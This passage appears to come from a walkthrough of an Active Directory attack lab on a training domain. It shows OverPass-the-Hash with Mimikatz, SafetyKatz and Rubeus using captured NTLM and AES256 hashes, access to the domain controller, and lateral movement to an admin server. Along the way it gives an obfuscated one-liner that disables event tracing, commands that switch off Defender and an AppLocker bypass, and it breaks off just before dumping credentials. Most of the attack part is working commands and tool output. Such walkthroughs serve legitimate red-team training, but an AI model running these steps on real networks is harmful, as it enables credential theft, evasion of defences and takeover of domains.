Since we have the hashes of the svcadmin (Domain Admin), we will execute an OverPass the Hash attack.

OverPass the Hash Attack

Invoke-Mimi
Using NTLM hash
The following command opens a powershell.exe with the user’s credentials. To run this command,
administrative privileges are required.
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<username> /domain:<Domain> /ntlm:<NTLM Hash of
the user> /run:powershell.exe"'

C:\Windows\system32>c:\AD\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=c:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> . C:\Ad\Tools\Invoke-Mimi.ps1
PS C:\Windows\system32> Invoke-Mimi -Command '"sekurlsa::pth /user:svcadmin
/domain:dollarcorp.moneycorp.local /ntlm:b38ff50264b74508085d82c69794a4d8 /run:powershell.exe"'

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
 '#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local

/ntlm:b38ff50264b74508085d82c69794a4d8 /run:powershell.exe
user : svcadmin
domain : dollarcorp.moneycorp.local
program : powershell.exe
impers. : no
NTLM : b38ff50264b74508085d82c69794a4d8
| PID 4284
| TID 6044
| LSA Process is now R/W
| LUID 0 ; 99381950 (00000000:05ec72be)
\_ msv1_0 - data copy @ 000002951FD99470 : OK !
\_ kerberos - data copy @ 000002952037A368
\_ aes256_hmac -> null
\_ aes128_hmac -> null
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace @ 0000029520326AA8 (32) -> null

A new PowerShell session opens. As already mentioned, the new PowerShell window process opens with
a logon type 9, which is similar to using runas /netonly. Under logon type 9, accessing local resources
reveals the original username, while accessing network resources utilizes the new credentials.

The following commands are executed in the new PowerShell Window.

PS C:\Windows\system32> $env:username
student163
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-dc -ScriptBlock {
$env:username;$env:computername }
svcadmin
DCORP-DC
PS C:\Windows\system32> winrs -r:dcorp-dc cmd.exe
Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.

C:\Users\svcadmin>set username
set username
USERNAME=svcadmin

C:\Users\svcadmin>set computername
set computername
COMPUTERNAME=DCORP-DC

Using AES hash

Invoke-Mimikatz -Command '"sekurlsa::pth /user:<user to impersonate> /domain:<domain>
/aes256:<aes256 key of the user> /run:powershell.exe"'

PS C:\Windows\system32> Invoke-Mimi -Command '"sekurlsa::pth /user:svcadmin

/domain:dollarcorp.moneycorp.local
/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /run:powershell.exe"'
 .#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local

/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /run:powershell.exe
user : svcadmin
domain : dollarcorp.moneycorp.local
program : powershell.exe
impers. : no
AES256 : 6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
| PID 5828
| TID 3432
| LSA Process is now R/W
| LUID 0 ; 101327957 (00000000:060a2455)
\_ msv1_0 - data copy @ 000002951FD99270 : OK !
\_ kerberos - data copy @ 000002952037A588
\_ aes256_hmac OK
\_ aes128_hmac -> null
\_ rc4_hmac_nt -> null
\_ rc4_hmac_old -> null
\_ rc4_md4 -> null
\_ rc4_hmac_nt_exp -> null
\_ rc4_hmac_old_exp -> null
\_ *Password replace @ 0000029520326DE8 (32) -> null

A new PowerShell session opens. As already mentioned, the new PowerShell window process opens with
a logon type 9, which is similar to using runas /netonly. Under logon type 9, accessing local resources
reveals the original username, while accessing network resources utilizes the new credentials. The
following commands are executed in the new PowerShell Window.
PS C:\Windows\system32> $env:username
student163
PS C:\Windows\system32> $env:computername
DCORP-STD163
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-dc -ScriptBlock {
$env:username;$env:computername }
svcadmin
DCORP-DC

SafetyKatz
The following command opens a powershell.exe with the user’s credentials. To run this command,
administrative privileges are required.
SafetyKatz.exe "sekurlsa::pth /user:<user to impersonate> /domain:<domain> /aes256:<aes256 key of
the user> /run:powershell.exe"' "exit"

C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1
C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> C:\AD\Tools\Loader.exe -Path "C:\AD\Tools\old_tools\SafetyKatz.exe"

"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local
/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /run:powershell.exe"
"exit"
[*] Applying amsi patch: true
[*] Applying etw patch: true
[*] Decrypting packed exe...
[!] ~Flangvik - Arno0x0x Edition - #NetLoader
[+] Patched!
[+] Starting C:\AD\Tools\old_tools\SafetyKatz.exe with args ''

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # -Path
ERROR mimikatz_doLocal ; "-Path" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz

cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # C:\AD\Tools\old_tools\SafetyKatz.exe
ERROR mimikatz_doLocal ; "C:\AD\Tools\old_tools\SafetyKatz.exe" command of "standard" module not
found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz

cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
 coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local

/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /run:powershell.exe
user : svcadmin
domain : dollarcorp.moneycorp.local
program : powershell.exe
impers. : no
AES256 : 6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
| PID 3304
| TID 4784
| LSA Process is now R/W
| LUID 0 ; 109243099 (00000000:0682eadb)
\_ msv1_0 - data copy @ 000002951FD9A470 : OK !
\_ kerberos - data copy @ 0000029520379AE8
\_ aes256_hmac OK
\_ aes128_hmac -> null
\_ rc4_hmac_nt -> null
\_ rc4_hmac_old -> null
\_ rc4_md4 -> null
\_ rc4_hmac_nt_exp -> null
\_ rc4_hmac_old_exp -> null
\_ *Password replace @ 0000029520326AA8 (32) -> null

mimikatz(commandline) # exit
Bye!

A new PowerShell session opens. The following commands are executed in the new PowerShell Window.
PS C:\Windows\system32> $env:computername
DCORP-STD163
PS C:\Windows\system32> $env:username
student163
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-dc -ScriptBlock {
$env:username;$env:computername }
svcadmin
DCORP-DC

Rubeus
Using NTLM hash
Rubeus needs to be executed from the command prompt.

The following command do not need administrative privileges.

Rubeus.exe asktgt /user:<username> /rc4:<ntml hash> /ptt

Here the parameter ptt injects the Kerberos ticket into the present session.
C:\Users\student163>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin
/rc4:b38ff50264b74508085d82c69794a4d8 /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Using rc4_hmac hash: b38ff50264b74508085d82c69794a4d8

[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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
cC5sb2NhbA==
[+] Ticket successfully imported!

ServiceName : krbtgt/dollarcorp.moneycorp.local
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 6/24/2024 4:32:12 AM
EndTime : 6/24/2024 2:32:12 PM
RenewTill : 7/1/2024 4:32:12 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : acc4fDXA0FcZHU9mOKRKCw==
ASREP (key) : B38FF50264B74508085D82C69794A4D8
C:\Users\student163>dir \\dcorp-dc.dollarcorp.moneycorp.local\C$
Volume in drive \\dcorp-dc.dollarcorp.moneycorp.local\C$ has no label.
Volume Serial Number is 1A5A-FDE2

Directory of \\dcorp-dc.dollarcorp.moneycorp.local\C$

05/08/2021 01:20 AM <DIR> PerfLogs

11/14/2022 11:12 PM <DIR> Program Files
05/08/2021 02:40 AM <DIR> Program Files (x86)
05/18/2024 01:32 AM <DIR> Users
01/10/2024 01:59 AM <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 6,478,733,312 bytes free
C:\Users\student163>winrs -r:dcorp-dc cmd.exe
Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.

C:\Users\svcadmin>set username
set username
USERNAME=svcadmin

C:\Users\svcadmin>set computername
set computername
COMPUTERNAME=DCORP-DC

Using AES hash

The following command requires elevation.
Rubeus.exe asktgt /user:<username> /aes256:<aes key> /opsec /createnetonly:<Process to start>
/show /ptt

C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin

/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec
/createnetonly:cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True

[*] Username : B6UB7HZK
[*] Domain : QLBBSBT4
[*] Password : 53WT3W9V
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 5216
[+] LUID : 0x6b83f75

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)

[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash:
6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 112738165
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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
[*] Target LUID: 0x6b83f75
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 6/24/2024 4:43:27 AM
EndTime : 6/24/2024 2:43:27 PM
RenewTill : 7/1/2024 4:43:27 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : vFSUdbYi/L1jR619cSPz4UKj3oKnLL2s/c91tIoIfIw=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

A new command prompt opens. The new command prompt opens with a logon type 9, which is similar to
using runas /netonly. Under logon type 9, accessing local resources reveals the original username, while
accessing network resources utilizes the new credentials. The following commands are executed in the
new command prompt process.
C:\Windows\system32>set username
USERNAME=student163
C:\Windows\system32>dir \\dcorp-dc.dollarcorp.moneycorp.local\C$\
Volume in drive \\dcorp-dc.dollarcorp.moneycorp.local\C$ has no label.
Volume Serial Number is 1A5A-FDE2

Directory of \\dcorp-dc.dollarcorp.moneycorp.local\C$

05/08/2021 01:20 AM <DIR> PerfLogs

11/14/2022 11:12 PM <DIR> Program Files
05/08/2021 02:40 AM <DIR> Program Files (x86)
05/18/2024 01:32 AM <DIR> Users
01/10/2024 01:59 AM <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 6,520,020,992 bytes free

C:\Windows\system32>winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd.exe

Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.

C:\Users\svcadmin>set username
set username
USERNAME=svcadmin

C:\Users\svcadmin>set computername
set computername
COMPUTERNAME=DCORP-DC

Lateral Movement – 2 (Using Derivative Admin)

A Derivative Admin refers to a user or group that indirectly gains administrative privileges over one or
more systems through a chain of permissions or group memberships. This concept is critical in
understanding privilege escalation paths in complex environments, such as Active Directory (AD) domains.

How Derivative Admins Work

In a typical AD environment, users and groups can be granted various levels of access to resources.
Sometimes, a user may not have direct administrative rights on a system but may have permissions that
allow them to gain such rights indirectly. Here are some ways derivative administrative access can occur:

1. Group Memberships: A user may be a member of a group that has administrative privileges on a
particular machine. For instance, if User A is a member of Group B, and Group B has administrative
rights on Machine C, then User A effectively has administrative rights on Machine C through Group
B.

2. Nested Groups: AD supports nested groups, where one group can be a member of another group.
This nesting can create complex paths of permissions. For example, User A is in Group B, which is
in Group C, and Group C has administrative privileges on Machine D. User A has administrative
privileges on Machine D due to these nested group memberships.

3. ACLs (Access Control Lists): Permissions defined in ACLs can grant administrative capabilities to
users or groups indirectly. For example, a user might have permissions to reset passwords or
modify group memberships, allowing them to escalate privileges.
 4. Resource Delegation: Administrative tasks can be delegated to users or groups. A user with
delegated administrative permissions on certain resources can perform administrative actions
without being a direct administrator.

Example Scenario

Consider an AD environment with the following setup:

• User Alice is a member of Group "IT Support".

• "IT Support" is a member of the "Server Admins" group.

• The "Server Admins" group has administrative rights on all servers.

In this case, Alice is a derivative admin on the servers because her membership in "IT Support" indirectly
grants her administrative rights through the "Server Admins" group.

From the screenshot, we can find that student163 has administrative privileges on the machine DCORP-
STD163. The user student163 also is a member of the RDPUsers group, which has administrative privileges
on the machine DCORP-ADMINSRV. So student163 also has administrative privileges on the machine
DCORP-ADMINSRV. We can also use Find-PSRemotingLocalAdminAccess.ps1 script to find the same
privileges. We will laterally move to DCORP-ADMINSRV and try to enumerate further.
PS C:\Users\student163> . C:\Ad\Tools\Find-PSRemotingLocalAdminAccess.ps1
PS C:\Users\student163> Find-PSRemotingLocalAdminAccess -ComputerFile
"C:\Users\student163\Desktop\shared\Computers.txt"
dcorp-adminsrv

Dumping credentials on DCORP-ADMINSRV

PS C:\Windows\system32> $Session = New-PSSession -ComputerName DCORP-ADMINSRV
PS C:\Windows\system32> Enter-PSSession -Session $Session
[DCORP-ADMINSRV]: PS C:\Users\student163\Documents>
[Reflection.Assembly]::"l`o`AdwIThPa`Rti`AlnamE"(('S'+'ystem'+'.C'+'ore'))."g`E`TTYPE"(('Sys'+'te
m.Di'+'agno'+'stics.Event'+'i'+'ng.EventProv'+'i'+'der'))."gET`FI`eLd"(('m'+'_'+'enabled'),('NonP
'+'ubl'+'ic'+',Instance'))."seTVa`l`Ue"([Ref]."a`sSem`BlY"."gE`T`TyPE"(('Sys'+'tem'+'.Mana'+'ge'+
'ment.Aut'+'o'+'mation.Tracing.'+'PSEtwLo'+'g'+'Pro'+'vi'+'der'))."gEtFIe`Ld"(('e'+'tw'+'Provid'+
'er'),('N'+'o'+'nPu'+'b'+'lic,Static'))."gE`Tva`lUe"($null),0)
Cannot invoke method. Method invocation is supported only on core types in this language mode.
At line:1 char:1
+ [Reflection.Assembly]::"l`o`AdwIThPa`Rti`AlnamE"(('S'+'ystem'+'.C'+'o ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : MethodInvocationNotSupportedInConstrainedLanguage

The machine has Constraint Language set on it. We can check this from the following PowerShell
Command.
[DCORP-ADMINSRV]: PS C:\Users\student163\Documents> $ExecutionContext.SessionState.Languagemode
ConstrainedLanguage

In all probability this is because of AppLocker or WDAC (Windows Defender Application Control). If
AppLocker or WDAC is enabled on a machine and if there is any restriction on the execution of script,s
then PowerShell relegates to Constraint Language Mode regardless of PowerShell running locally or
PowerShell remoting.

We can use the cmdlet Get-AppLockerPolicy to check if AppLocker is enabled on the machine.
[DCORP-ADMINSRV]: PS C:\Users\student163\Documents> Get-AppLockerPolicy -Effective | Select -
ExpandProperty RuleCollections

PublisherConditions : {*\O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\*,*}

PublisherExceptions : {}
PathExceptions : {}
HashExceptions : {}
Id : 38a711c4-c0b8-46ee-98cf-c9636366548e
Name : Signed by O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US
Description :
UserOrGroupSid : S-1-1-0
Action : Allow

PublisherConditions : {*\O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\*,*}

PublisherExceptions : {}
PathExceptions : {}
HashExceptions : {}
Id : 8a64fa2c-8c17-415a-8505-44fc7d7810ad
Name : Signed by O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US
Description :
UserOrGroupSid : S-1-1-0
Action : Allow

PathConditions : {%PROGRAMFILES%\*}
PathExceptions : {}
PublisherExceptions : {}
HashExceptions : {}
Id : 06dce67b-934c-454f-a263-2515c8796a5d
Name : (Default Rule) All scripts located in the Program Files folder
Description : Allows members of the Everyone group to run scripts that are located in the
Program Files folder.
UserOrGroupSid : S-1-1-0
Action : Allow

PathConditions : {%WINDIR%\*}
PathExceptions : {}
PublisherExceptions : {}
HashExceptions : {}
Id : 9428c672-5fc3-47f4-808a-a0011f36dd2c
Name : (Default Rule) All scripts located in the Windows folder
Description : Allows members of the Everyone group to run scripts that are located in the
Windows folder.
UserOrGroupSid : S-1-1-0
Action : Allow

As per the output, Everyone (S-1-1-0) can run any PowerShell scripts located in the folders
%ProgramFiles% and %WINDIR%. So anyone can run PowerShell scripts located in those locations. SO we
can copy the PowerShell Scripts to those locations and execute them.

We can copy the Invoke-MimiKatz.ps1 to those locations. Before that we will disable Defender.
[DCORP-ADMINSRV]: PS C:\Users\student163\Documents> Set-MpPreference -DisableRealtimeMonitoring
$true
[DCORP-ADMINSRV]: PS C:\Users\student163\Documents> Set-MpPreference -DisableBehaviorMonitoring
$true
[DCORP-ADMINSRV]: PS C:\Users\student163\Documents> Set-MpPreference -
DisableIntrusionPreventionSystem $true
[DCORP-ADMINSRV]: PS C:\Users\student163\Documents> Set-MpPreference -DisableIOAVProtection $true

Now we will copy the scripts to the Windows folder. We can copy either using the GUI or command.
[dcorp-adminsrv]: PS C:\Users\student163\Documents> cd 'Program Files'
[dcorp-adminsrv]: PS C:\Program Files> ls

Directory: C:\Program Files

Mode LastWriteTime Length Name

---- ------------- ------ ----
d----- 5/8/2021 1:27 AM Common Files
d----- 5/8/2021 1:15 AM Internet Explorer
d----- 5/8/2021 1:15 AM ModifiableWindowsApps
d----- 11/11/2022 1:57 AM Windows Defender
d----- 1/1/2024 4:48 AM Windows Defender Advanced Threat Protection
d----- 5/8/2021 2:34 AM Windows NT
d----- 5/8/2021 1:27 AM WindowsPowerShell
-a---- 6/24/2024 10:36 PM 2070895 Invoke-MimiEx.ps1

Now we will dump the credentials.

